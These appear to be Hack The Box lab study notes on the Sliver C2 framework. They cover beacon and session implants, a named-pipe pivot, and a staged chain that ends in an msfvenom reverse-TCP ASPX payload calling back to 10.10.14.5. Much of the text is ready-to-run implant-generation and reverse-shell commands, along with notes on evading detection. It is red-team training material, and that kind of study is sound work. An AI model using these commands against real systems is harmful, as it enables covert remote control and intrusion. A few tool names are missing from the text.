Sliver's Server component has the important role of serving as the location implants will communicate back to.
Sliver's Client component has the role of being the location the user will execute the commands and tools needed to fulfill their objectives.
A downside of not having a server and a client is that everything runs inside the process of Sliver, meaning that if you accidentally terminate the process, you might lose the beacons or sessions.
Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ sudo apt install golang-go
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
Aspect
Beacon Mode
Session Mode
Definition
Operates in intervals, executing commands at set periods.
Enables immediate execution of commands by the operator.
Purpose
Used for stealthy, long-term operations where maintaining a low profile is essential.
Used for active tasks requiring instant feedback and uninterrupted communication.
Operation
Executes commands periodically at predefined intervals.
Provides real-time interaction and immediate execution of commands.
Ideal Use Case
Long-term persistence and low-profile operations.
Active tasks and situations demanding immediate operator feedback.
sliver > generate beacon --http <your_server_ip> --os linux --arch x86 --format elf --seconds 5 --jitter 3
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
-J / --jitter sets up the jitter time of the callback from the implant in a manner that will fluctuate based on the value.
-S / --seconds, which allows us to set the time interval of the callback.
-l / --skip-symbols skip symbol obfuscation.
One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext.
Named pipes are primarily used for pivoting on Windows
Though the C2 traffic of Sliver looks legitimate, using HTTPS, MTLS, or WireGuard listeners to establish a more secure channel adds a layer of protection.
#starting the pipe pivot listener,
[server] sliver (http_beacon) > pivots named-pipe --bind firstpipe
[*] Started named pipe pivot listener \\.\pipe\firstpipe with id 1
#generate a pivot implant
sliver > generate --named-pipe 127.0.0.1/pipe/firstpipe -N pipe_silver --skip-symbols
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 1s
[*] Implant saved to /home/intrusionz3r0/pipe_silver.exe
Create a shellcode with MSFVenom and Silver
We need to create a profile, a stage-listener, a stager and generate a payload through msfvenom.
Sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
[*] Saved new implant profile z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
[*] No builds found for profile z3r0, generating a new one
[*] Sliver name for profile z3r0: SURVIVING_DUMP
[*] Job 1 (tcp) started
sliver > http -L 10.10.14.5 -l 8088
[*] Starting HTTP :8088 listener ...
[*] Successfully started job #2
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt
#Lastly create the payload and replate the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx
Sliver can host multiple operators simultaneously in a mode known as .
is a tool used to enumerate the environment written in C# used both by red team operators (professionals) and blue team members to assess the current security posture.
is a tool focused on creating binary shellcodes that can be executed in memory; Donut will generate a shellcode of a .NET binary, which can be executed via the execute-shellcode argument in Sliver.
